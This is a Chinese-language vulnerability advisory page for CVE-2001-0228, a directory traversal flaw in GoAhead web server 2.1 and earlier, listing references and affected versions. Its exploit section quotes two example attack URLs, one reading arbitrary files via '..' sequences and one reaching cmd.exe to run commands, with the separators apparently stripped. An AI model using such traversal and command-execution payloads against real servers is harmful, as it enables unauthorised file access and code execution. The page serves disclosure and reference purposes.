GoAhead web server目录遍历漏洞

GoAhead web server目录遍历漏洞

漏洞ID 1106200 漏洞类型 路径遍历
发布时间 2001-02-02 更新时间 2001-05-03
图片[1]-GoAhead web server目录遍历漏洞-安全小百科CVE编号 CVE-2001-0228
图片[2]-GoAhead web server目录遍历漏洞-安全小百科CNNVD-ID CNNVD-200105-040
漏洞平台 Windows CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/20607
https://www.securityfocus.com/bid/88638
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200105-040
|漏洞详情
GoAheadwebserver2.1和之前版本存在目录遍历漏洞。远程攻击者借助HTTPGET请求中..攻击读取任意文件。
|漏洞EXP
source: http://www.securityfocus.com/bid/2334/info

A specially crafted URL composed of '..' sequences along with the known filename will disclose the requested file. This vulnerability will also allow an attacker to execute arbitrary code with root privileges. 

Gaining access to a known file:

http://target/............filename

Executing arbitrary commands:

http://target/cgi-bin/............winntsystem32cmd.exe?/c+dir+c:
|受影响的产品
GoAhead Software GoAhead Webserver (Windows) V.2.0

GoAhead Software GoAhead WebServer v.2.1

|参考资料

来源:BUGTRAQ
名称:20010202GoAheadWebServerDirectoryTraversalVulnerability
链接:http://archives.neohapsis.com/archives/bugtraq/2001-02/0022.html

相关推荐: FreeBSD TCP RST拒绝服务漏洞

FreeBSD TCP RST拒绝服务漏洞 漏洞ID 1207274 漏洞类型 未知 发布时间 1998-10-13 更新时间 1998-10-13 CVE编号 CVE-1999-0053 CNNVD-ID CNNVD-199810-013 漏洞平台 N/A …

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享